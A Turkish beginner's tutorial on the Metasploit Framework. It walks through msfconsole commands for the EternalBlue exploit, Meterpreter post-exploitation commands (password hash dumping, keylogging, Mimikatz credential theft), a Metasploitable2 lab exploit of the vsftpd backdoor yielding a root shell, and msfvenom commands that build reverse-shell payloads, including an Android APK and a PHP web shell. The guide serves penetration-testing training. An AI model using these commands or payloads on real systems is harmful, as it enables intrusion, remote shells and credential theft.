Metasploit Framework Kullanımı: Sıfırdan İlk Exploit'e Başlangıç Rehberi
Araç Rehberi • Exploit Çerçevesi
Metasploit Framework: Sıfırdan İlk Exploit'e
Metasploit, 2003'te HD Moore tarafından geliştirilen ve bugün Rapid7 tarafından yönetilen açık kaynaklı exploit çerçevesidir. 2000'den fazla exploit, yüzlerce payload ve otomatik post-exploitation modülüyle sektörün en kapsamlı sızma testi platformudur. Yalnızca izin verilen sistemlerde kullanılmalıdır.
1. Metasploit Mimarisi: Ne Neye Yarar?
2. Temel msfconsole Komutları
help # Komutları listele
search eternalblue # Exploit ara
use exploit/windows/smb/ms17_010_eternalblue # Seç
show options # Gerekli parametreler
set RHOSTS 192.168.1.100 # Hedef IP
set LHOST 192.168.1.50 # Dinleyici IP (sizin)
set PAYLOAD windows/x64/meterpreter/reverse_tcp # Payload
run # Çalıştır
sessions -l # Açık oturumlar
sessions -i 1 # 1. oturuma bağlan
3. Meterpreter: Post-Exploitation İsviçre Çakısı
Meterpreter, bellekte çalışan (disk yazısı bırakmayan), şifreli kanal üzerinden iletişim kuran gelişmiş payload'dır. Sistem üzerinde son derece geniş yetenekler sunar:
getuid # Mevcut kullanıcı
getsystem # Otomatik yetki yükseltme dener
hashdump # Windows şifre hash'lerini çek
screenshot # Ekran görüntüsü al
keyscan_start # Keylogger başlat
keyscan_dump # Kaydedilen tuşları al
upload /root/tool.exe C:\\Windows\\Temp # Dosya yükle
download C:\\Users\\target\\file.txt # Dosya indir
run post/multi/recon/local_exploit_suggester # LPE önerir
load kiwi # Mimikatz entegrasyonu
creds_all # Tüm kimlik bilgilerini çek
4. Lab Senaryosu: Metasploitable2'ye İlk Exploit
Metasploitable2 kasıtlı olarak zafiyetli yapılmış bir Linux imajıdır. VirtualBox'a kurup güvenle pratik yapabilirsiniz. Popüler hedef: vsftpd 2.3.4 backdoor.
nmap -sV -p 21 192.168.1.200
# Sonuç: 21/tcp open ftp vsftpd 2.3.4
# Metasploit ile exploit
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.200
run
# [*] Command shell session 1 opened → Root shell!
id # uid=0(root) gid=0(root)
5. msfvenom: Özelleştirilmiş Payload Üretimi
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe
# Android APK payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o malicious.apk
# PHP web shell (web server'a yüklenir)
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php